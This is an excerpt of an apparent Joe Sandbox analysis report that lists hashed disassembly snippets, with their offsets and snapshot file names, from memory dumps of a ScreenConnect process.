                                                                                  • Opcode Fuzzy Hash: c51b7c395f200462357748ae36217e55648faf989fbf616b63c39e3640f9b72e
                                                                                  • Instruction Fuzzy Hash: 0301813AA2D5070AFFADDA1940A87F812D3AF44300F44227CD96ECA1E3EE1CF8048710
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 731efbdc87b1fd2295d4077409873157a4d2095d88702b0a561884ece5f6b34a
                                                                                  • Instruction ID: 370e7ba9caa830927928848185be92de4e73020bd3b0e33750afb3ee98da7e3c
                                                                                  • Opcode Fuzzy Hash: 731efbdc87b1fd2295d4077409873157a4d2095d88702b0a561884ece5f6b34a
                                                                                  • Instruction Fuzzy Hash: 62F0B471A08A198FCB48DF5CD491AE8F7E2FBE8300F0445AAD10DD7792CA709882CBC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4d0068a95fc5ae411eed123c7e7080985be871c3b8289be3e53bb5276a593376
                                                                                  • Instruction ID: 0a7f8a10ad22a1e9f211faeb613de0d569a4685ad9629eee74a6f41f6557db3f
                                                                                  • Opcode Fuzzy Hash: 4d0068a95fc5ae411eed123c7e7080985be871c3b8289be3e53bb5276a593376
                                                                                  • Instruction Fuzzy Hash: 42F0343595895C8F8F94EF6CE805ADABBB0FA99304F00029AE918D3210D621DA588BD1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9a8120c85e533a400b6da078aea1ee8437af320946a0d95c063b230d19b29c49
                                                                                  • Instruction ID: 4b8dac9aed6d47d1f527f7a4815c4004e33de3a86f527f4fb4553028b4f59f90
                                                                                  • Opcode Fuzzy Hash: 9a8120c85e533a400b6da078aea1ee8437af320946a0d95c063b230d19b29c49
                                                                                  • Instruction Fuzzy Hash: 1CF04F3165CE494FDBA8EA298498B6177E5EB68314B14046DD05AC36A2CE39E886C790
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ab3357a1a6d54fb2b2a67543b36492fb0455bd2b6c0be2f93ae99f4737b2f584
                                                                                  • Instruction ID: 43b451217e396140d1dbd777622fdbfd2d2e2751ae958168cac61fa7050d734f
                                                                                  • Opcode Fuzzy Hash: ab3357a1a6d54fb2b2a67543b36492fb0455bd2b6c0be2f93ae99f4737b2f584
                                                                                  • Instruction Fuzzy Hash: EBF01D34728E4E8F9FC8EF1CC0906A973E2FBA834472441A8841DC768ACE34F8138780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f18eb0fac2c7e5bf65399bd0141e4cbdeca48bb52588b8352e5a48def1663e7b
                                                                                  • Instruction ID: 20ba6f9aef1fe90f31bdc8f47ed26ad6e376db5880da7dc6a4c1d2c04a1d30e1
                                                                                  • Opcode Fuzzy Hash: f18eb0fac2c7e5bf65399bd0141e4cbdeca48bb52588b8352e5a48def1663e7b
                                                                                  • Instruction Fuzzy Hash: 24F0A721B6CD0E0F9BD8E62C54046A9A2D5FFD8350B6443B7E41DC3399ED28DC824384
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 58603a91427949b3dd1b5a9eb6ed3b9837137e03caddca21ea6f17c6888c1d13
                                                                                  • Instruction ID: 9395d8622e029c3083e26020a2946f2a3ef6e7a19899822c0b2750ca47e3e70d
                                                                                  • Opcode Fuzzy Hash: 58603a91427949b3dd1b5a9eb6ed3b9837137e03caddca21ea6f17c6888c1d13
                                                                                  • Instruction Fuzzy Hash: 87F0E206BBCC460BA788AB6C60415FDA381EFD82A079402B7D22DC72EFDC08D9434380
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 25ff5cabc9d34ac98857b311e93763bf28260e5aef26540679f34f2c59a514ef
                                                                                  • Instruction ID: db20c5ddd306222f83eeb3129b88965c3172a1d7e8646bfb40bedbe96f953f3f
                                                                                  • Opcode Fuzzy Hash: 25ff5cabc9d34ac98857b311e93763bf28260e5aef26540679f34f2c59a514ef
                                                                                  • Instruction Fuzzy Hash: F4F03031628909CFDF98EF28C094AA473A2FF5830475450ECC45ECB2A6CA35FC02CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 159d9321a68e582d74b918c48ecd90fe304d0e296976b9d05e1a25cdfd0d41e4
                                                                                  • Instruction ID: a6b9984f57406babb6584aae81f66529364660ae048f951bb76b47d2cc26feeb
                                                                                  • Opcode Fuzzy Hash: 159d9321a68e582d74b918c48ecd90fe304d0e296976b9d05e1a25cdfd0d41e4
                                                                                  • Instruction Fuzzy Hash: F7F03A316289098FDF98EF28C494EA677A2FF6830475445E8D45EDB2A6CA35FC42CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 86e5c289f578a9dfe5498e525df6942c9329115403ae1c3453e7323563a50204
                                                                                  • Instruction ID: 24419a32e1cc6c7b904f37a05e7e687ba5b448e82415a4d6c67ce33d95208506
                                                                                  • Opcode Fuzzy Hash: 86e5c289f578a9dfe5498e525df6942c9329115403ae1c3453e7323563a50204
                                                                                  • Instruction Fuzzy Hash: D2F0202320DB850AE760EA2C7C430F03BD2EB031707442ABEC5D9830A7E406F0138381
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 129e3efabd16dfd6e8c2446d845cc51fcd4904b7f2eb9f8d2f1b40d8274b5b48
                                                                                  • Instruction ID: 0614de35d6595a8224da193a121ce615064310e2fb0a37c26f42fbcc0652c15c
                                                                                  • Opcode Fuzzy Hash: 129e3efabd16dfd6e8c2446d845cc51fcd4904b7f2eb9f8d2f1b40d8274b5b48
                                                                                  • Instruction Fuzzy Hash: F1F09035B285164AFAB9DA1D44983F422C3FB48304F9412B8C91CC72D6DD28BC018741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7edb9c99b625a60e9356413c4988a94f8cad1b419db87ddba81c0fbc18bb30d0
                                                                                  • Instruction ID: 9cad9b805337e1afebf4565639e3b2b58b9cce10a04c93fed00f4e8544bb0fc4
                                                                                  • Opcode Fuzzy Hash: 7edb9c99b625a60e9356413c4988a94f8cad1b419db87ddba81c0fbc18bb30d0
                                                                                  • Instruction Fuzzy Hash: 0CF0823174A6098FDB95EB2CD4556A8B3E1EF4531174804BAD409CB273DF2AAC55C740
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 09c6d40f99cd854e7f24eb5ccc8b0682e0cd4cb6bdf416edf0ad20ddb959c414
                                                                                  • Instruction ID: ae2ab02a08cec02a46182f04855856ca46b23bcf1ff4bc47efba803407531f46
                                                                                  • Opcode Fuzzy Hash: 09c6d40f99cd854e7f24eb5ccc8b0682e0cd4cb6bdf416edf0ad20ddb959c414
                                                                                  • Instruction Fuzzy Hash: 62F0E53240961C9FCB11EB2DE4518D97BB4EF06318B0511E7E00DCB072EB31A949CBC1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6985b497610f31623b51465ddcd66a2a78cc628325dfa2bcb681004d9c7eb0fc
                                                                                  • Instruction ID: bc9807765edd9ba22b80cf8a12724aa6aacfbac5d6d5c7aba937a965a5037c5b
                                                                                  • Opcode Fuzzy Hash: 6985b497610f31623b51465ddcd66a2a78cc628325dfa2bcb681004d9c7eb0fc
                                                                                  • Instruction Fuzzy Hash: 32F0C034314A198F9F95EF18C098A6573E1FF6D74531501799509CB265DE61DC42CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dd9d5eeb89073f0372c2f70794b698d7c2f9e0503dffa324503a7a0d1d086b3d
                                                                                  • Instruction ID: b687d02787e49ab810c86b16d1a6409024d22bd9d2e2dfdef71123266e10326b
                                                                                  • Opcode Fuzzy Hash: dd9d5eeb89073f0372c2f70794b698d7c2f9e0503dffa324503a7a0d1d086b3d
                                                                                  • Instruction Fuzzy Hash: C9F0303581DA8C9FCB46EB64D4558DABFB0EF56310B0541CBE049CB062E7219A59CB82
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 94cedb07880d6e3e25d2675269bcc7ccadfd23a138b07670cab469cd561c8461
                                                                                  • Instruction ID: 3f8fcdb7c7d2435a8997f07d51da70c1d0b277a8a1317a0f898b0cba2fb7fe88
                                                                                  • Opcode Fuzzy Hash: 94cedb07880d6e3e25d2675269bcc7ccadfd23a138b07670cab469cd561c8461
                                                                                  • Instruction Fuzzy Hash: 1DE0D8127B8C090B5B88B66C60955FDA3C1EBD826035003B7D41EC22DADC18D9434380
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 17eeccce9bcb3252422a7a9f85125e391b21c4a03e791ba5ca9bc5fe62467af2
                                                                                  • Instruction ID: e563470696fb4cec883f91f3805cade5f76271dd071fdff592733824fbaf45af
                                                                                  • Opcode Fuzzy Hash: 17eeccce9bcb3252422a7a9f85125e391b21c4a03e791ba5ca9bc5fe62467af2
                                                                                  • Instruction Fuzzy Hash: E0E09232B2CA0A4FDB45EF1CD4456EAB3A0FB88354F105237D61EC7292DE39E8528780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e3f7bc10ab872abb127573ca55bc3b4addb55fc6965a3ebc5a2a8fc7faaaa169
                                                                                  • Instruction ID: ed9b1feb23f8f16d2ec81cbc7cc6f1426bf0259c03ce5367d0573c1774c13226
                                                                                  • Opcode Fuzzy Hash: e3f7bc10ab872abb127573ca55bc3b4addb55fc6965a3ebc5a2a8fc7faaaa169
                                                                                  • Instruction Fuzzy Hash: 05E0D82650F7D50FEB529B3484588E13F91EE2722070901EBD4858F0B3F5159649C751
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 354a29f1ef39f1a683026fdd35e49e13d7f4b8cc9f2713ae38bb1cb241d4cc7a
                                                                                  • Instruction ID: c2c87fc2133ee090b8d13513e4aa33fac56ddbf0fd73964b0fee1c6922da37ad
                                                                                  • Opcode Fuzzy Hash: 354a29f1ef39f1a683026fdd35e49e13d7f4b8cc9f2713ae38bb1cb241d4cc7a
                                                                                  • Instruction Fuzzy Hash: 4CE0C212B1D8690EA6F4A26D38482B21AC7DBD9132B6902B3D81CD32A9EC499C8343C0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d869cc7bae054b23cd701a15801e47da8cebe943a234ac24f20cd01419573ad4
                                                                                  • Instruction ID: d8d87ea7c8f316e917120e6dcfa48ac85534db917861083f0a40326048b69e64
                                                                                  • Opcode Fuzzy Hash: d869cc7bae054b23cd701a15801e47da8cebe943a234ac24f20cd01419573ad4
                                                                                  • Instruction Fuzzy Hash: A1F0A5316189088FDFA8EF18C094B6537E2FFA830472441ECD45EDB2A6CA32EC42CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e88fe044f2e5a6183eb06e0ff78ee49fc800d6e9b17ddb33b696a3b6c3ebbb6b
                                                                                  • Instruction ID: 71824b4cc4b40a6a57843999b3fd48f60aca22ec6c7894322d24f86360106d9d
                                                                                  • Opcode Fuzzy Hash: e88fe044f2e5a6183eb06e0ff78ee49fc800d6e9b17ddb33b696a3b6c3ebbb6b
                                                                                  • Instruction Fuzzy Hash: 49E0BF23F5CC2A4E9BA0E69CA5452EDB3A5EB992A1F540273C61DD3166DE28680643D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9363ecebedec4d61a2d3d32af5b93a80b45023c04ba64ab4edbf0d45bd8ce5a2
                                                                                  • Instruction ID: 3370f3a22b65a744830f30d0327dc4b9359392e5b5f5f0594e91fe71cacea996
                                                                                  • Opcode Fuzzy Hash: 9363ecebedec4d61a2d3d32af5b93a80b45023c04ba64ab4edbf0d45bd8ce5a2
                                                                                  • Instruction Fuzzy Hash: C7F045356189088FDF98EF18C094B6577E2FBA830471441DC945EDB2A6CA32EC42CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5e5a6fa94adffc05ccafe5d43ca2b441283fc8a8ce55d630127ab21eecd39354
                                                                                  • Instruction ID: 8cf0f9ca78c6a0ca225a4c398e2c729fae93fa08f80ebf04117d3317d191bfd7
                                                                                  • Opcode Fuzzy Hash: 5e5a6fa94adffc05ccafe5d43ca2b441283fc8a8ce55d630127ab21eecd39354
                                                                                  • Instruction Fuzzy Hash: 90E06D62D9E1834FD7118B788C199E53FA4BF9321070982F6E6588B0B7D61C64058751
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9374902b43789b479c38ca41d3a2bd9dbed65e6afae89d59855e7e00cf928455
                                                                                  • Instruction ID: b643ebebb1d6333797732c4daef01d59513c622144408199d38ee8f24e2ab0ba
                                                                                  • Opcode Fuzzy Hash: 9374902b43789b479c38ca41d3a2bd9dbed65e6afae89d59855e7e00cf928455
                                                                                  • Instruction Fuzzy Hash: 23E04612B2891D0F9BE9A61C0462A38A2C2EB9868075A00A6850DC72E6EE14EC024381
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 897d22d9535db7474e9a3925306de964740d3d8cc1ca6cc1dbcf670354ae6f60
                                                                                  • Instruction ID: 7cc0e0fde1a50f5f778c26c1ec57007514fe1a1960186fefcd8951f965b7d531
                                                                                  • Opcode Fuzzy Hash: 897d22d9535db7474e9a3925306de964740d3d8cc1ca6cc1dbcf670354ae6f60
                                                                                  • Instruction Fuzzy Hash: EAE06D1FF6CA960AE365DA2C44850E4ABD5DF8E290B0404BBD75CC21B3DC69E8090245
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ff94624a20509e21055761a691d8c8cf1c4915ecb9da588548d061ed39df58c9
                                                                                  • Instruction ID: a98e8fe8da2040d3747c8e60eb99c2c0e446c934ea00d602ca78e38580de3198
                                                                                  • Opcode Fuzzy Hash: ff94624a20509e21055761a691d8c8cf1c4915ecb9da588548d061ed39df58c9
                                                                                  • Instruction Fuzzy Hash: 1DD01222B6DF2E4A66B0654C248527973C2EB987907550376C908C7659CD14FC4302C5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 48c1c9e185b9b792ca3774426d3bab833298d637be8d864f8a87f60fef59db91
                                                                                  • Instruction ID: cf7df9eca5fec081b28675bacba664234c9fbe30c4831662d8b5a361c878368b
                                                                                  • Opcode Fuzzy Hash: 48c1c9e185b9b792ca3774426d3bab833298d637be8d864f8a87f60fef59db91
                                                                                  • Instruction Fuzzy Hash: 04E01A70268A4A8FCF88EF28C4949A973A1FB9934476055ADD51BC739ADE35E843CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 27841e0e139510425a629ea61cd75ba720647fd97e8fe97d0bcd739645188a0e
                                                                                  • Instruction ID: 66cae81b1d6906142cddebf2153420f0bf54e5dbef5c061563e77f05a7e4f133
                                                                                  • Opcode Fuzzy Hash: 27841e0e139510425a629ea61cd75ba720647fd97e8fe97d0bcd739645188a0e
                                                                                  • Instruction Fuzzy Hash: E2E0EC11E39E1E4AAAE566A80018275A0C2BF98641F5522758D1DD32A5FD18FC058280
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 09c2ec1b5eb45844183c4698483ef8f77b33ce30612056ce3ba7eb37b8a3bba4
                                                                                  • Instruction ID: e7a538868fb6dcc1c0aa33a8c90f567b1a5414cf6813dd19c79b74e2fc7f662c
                                                                                  • Opcode Fuzzy Hash: 09c2ec1b5eb45844183c4698483ef8f77b33ce30612056ce3ba7eb37b8a3bba4
                                                                                  • Instruction Fuzzy Hash: 46E08C71A2090C8F9794EF2CC08822833E1EF1C30231A00B8995ED73A1DE20EC828780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4ee54ebd8ee90474de0655dce3c063b96a1f51b7c37c91fb38d671d239b2976a
                                                                                  • Instruction ID: caf5d9d53cfc70d48c7f383bfd56a48676e4a620ac72ce5e32489ab6b71e8843
                                                                                  • Opcode Fuzzy Hash: 4ee54ebd8ee90474de0655dce3c063b96a1f51b7c37c91fb38d671d239b2976a
                                                                                  • Instruction Fuzzy Hash: 03D01211BA8C4A0A9988B27C24115ACE1D2EFD826079812B3E41DC26EADD1899820280
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 36eef4ab6df145151175cc3faa686c0624bfca5bf10215bac7603095dfda879c
                                                                                  • Instruction ID: 7fbc2ebdb36ebc08a04b47f15f037577a77aaeff16161b44b9071e930a1adb5e
                                                                                  • Opcode Fuzzy Hash: 36eef4ab6df145151175cc3faa686c0624bfca5bf10215bac7603095dfda879c
                                                                                  • Instruction Fuzzy Hash: 9ED0C911758D0E0F6BD4E92D54993B913C6EBDC151B544576961DC336AEC24DC970300
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7ceaba4f8105332ca936cad523fe4f5f2e2a43f00d7c549c42756dbac0a06482
                                                                                  • Instruction ID: 0776bd24cdebe4232a5708a1452beedb4a5dce74fb5dac2d43d28aa39bd77579
                                                                                  • Opcode Fuzzy Hash: 7ceaba4f8105332ca936cad523fe4f5f2e2a43f00d7c549c42756dbac0a06482
                                                                                  • Instruction Fuzzy Hash: 69E0C2356185088FCF919F6894006FD33A2FF0A300B500598E01CD7292DA39E911C700
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d79d65068f60bd781b1db0e0521736e59d443e875957d521547f317f9970c91c
                                                                                  • Instruction ID: 6518867977be8d3e8420a7d761f19aec1124803b14ec6921ab764dd312fc97f3
                                                                                  • Opcode Fuzzy Hash: d79d65068f60bd781b1db0e0521736e59d443e875957d521547f317f9970c91c
